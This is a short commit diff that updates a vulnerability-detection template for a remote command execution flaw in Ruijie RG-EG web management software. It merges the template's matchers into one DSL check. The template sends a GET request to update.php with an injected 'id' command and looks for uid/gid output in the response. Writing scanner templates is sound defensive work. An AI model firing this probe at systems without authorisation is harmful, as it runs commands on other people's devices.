Update ruijie-rg-eg-web-mis-rce.yaml
parent
f5507a81b9
commit
dc0ad486a4
|
@ -31,13 +31,10 @@ http:
|
|||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/update.php?jungle=id"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code == 200'
|
||||
- 'regex("uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)", body)'
|
||||
condition: and
|
||||
|
|
Loading…
Reference in New Issue